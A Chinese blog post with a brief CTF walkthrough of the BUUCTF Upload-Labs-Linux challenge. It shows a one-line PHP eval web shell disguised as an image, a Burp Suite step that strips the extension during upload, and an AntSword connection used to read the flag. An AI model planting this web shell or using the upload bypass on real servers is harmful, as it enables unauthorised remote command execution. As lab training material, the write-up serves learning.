热门标签
热门文章
- 1Elasticsearch:IK 中文分词器_elasticsearch ik分词器
- 2消息中间件rabbitmq学习(一)_sxsxsxsxsxsxsxsxs
- 3angular 安装batarang踩到的那些坑儿_angularjs batarang 安装成功,但是scopes为空白
- 4parallels试用期到了怎么办?parallels试用期到期可继续使用_parallels试用期到了继续用
- 5【ROS2机器人入门到实战】配置Fishbot进行建图
- 6本科毕设研究记录(一)————小样本综述_unreliable empirical risk minimizer
- 7使用Pytorch中从头实现去噪扩散概率模型(DDPM)
- 8关于四足行走机器人步态分析STM32+SG90舵机控制_王龙基于stm32制作四足机器人
- 9[Leetcode]Reverse Linked List-再写单链表反转_leetcode 翻转链表 java 提交
- 10Python基础——dict(字典) ——items() 方法_python dict items
当前位置: article > 正文
BUU basic模块 Upload-Labs-Linux 1_buu-upload-linuxs
作者:码创造者 | 2024-07-19 01:00:10
赞
踩
buu-upload-linuxs
(5) Upload-Labs-Linux
(5.1) 上传一个文件,查看文件的路径,发现是 /upload/A003.jpg
(5.2) 创建一个脚本文件,内容如下。然后修改文件名为图片格式
<?php @eval($_POST[1234])?>(5.3) 选择文件,开启浏览器代理,开启burpSuite的代理拦截
(5.4) bp拦截请求,修改文件名,去掉图片后缀
(5.5) 拼接链接,在蚁剑访问这个文件,设置密码“1234”
(5.6) 在蚁剑找到根目录,看到了flag文件,查看flag文件内容
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/码创造者/article/detail/848573
推荐阅读
相关标签
